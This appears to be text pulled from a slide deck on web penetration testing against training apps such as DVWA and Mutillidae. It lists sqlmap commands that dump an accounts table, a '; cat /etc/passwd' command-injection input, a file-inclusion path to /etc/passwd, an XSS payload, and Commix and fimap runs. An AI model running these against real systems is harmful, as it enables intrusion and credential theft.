WEB RECONNAISSANCE Burp Suite burpsuite WEB RECONNAISSANCE Dirbuster
WEB RECONNAISSANCE Burp Suite: # burpsuite Милош Антонијевић
WEB RECONNAISSANCE Dirbuster: # dirbuster Милош Антонијевић
SQL Injection Burp Suite: Милош Антонијевић
SQL Injection Sql. Map: # sqlmap -u "http: //nsacia. gov/mutillidae/index. php? page=login. php" --forms -batch --dbs Милош Антонијевић
SQL Injection Sql. Map: # sqlmap -u "http: //nsacia. gov/mutillidae/index. php? page=login. php" --forms -batch -D mutillidae --tables Милош Антонијевић
SQL Injection Sql. Map: # sqlmap -u "http: //nsacia. gov/mutillidae/index. php? page=login. php" --forms -batch -T accounts --dump Милош Антонијевић
Command Injection DVWA: 127. 0. 0. 1; cat /etc/passwd Милош Антонијевић
Command Injection Commix: #commix --url "http: //localhost/DVWA/vulnerabilities/exec/" -cookie='security=low; PHPSESSID=k 0 femmah 6 ugsrkigr 5 ra 9 dosc 5' -data='ip=INJECT_HERE&Submit=Submit' --all Милош Антонијевић
XSS (Cross Site Scripting) DVWA: /DVWA/vulnerabilities/xss_d/? default=<script>alert("XSS"); </script> Милош Антонијевић
File Inclusion DVWA: /DVWA/vulnerabilities/fi/? page=/etc/passwd Милош Антонијевић
File Inclusion Fimap: # fimap --url 'http: //localhost/DVWA/vulnerabilities/fi/? page=include. php' -cookie='security=low; PHPSESSID=k 0 femmah 6 ugsrkigr 5 ra 9 dosc 5' --enable-blind Милош Антонијевић
File Inclusion Fimap: # fimap --url 'http: //localhost/DVWA/vulnerabilities/fi/? page=include. php' -cookie='security=low; PHPSESSID=k 0 femmah 6 ugsrkigr 5 ra 9 dosc 5' –enable-blind x Милош Антонијевић
- Slides: 17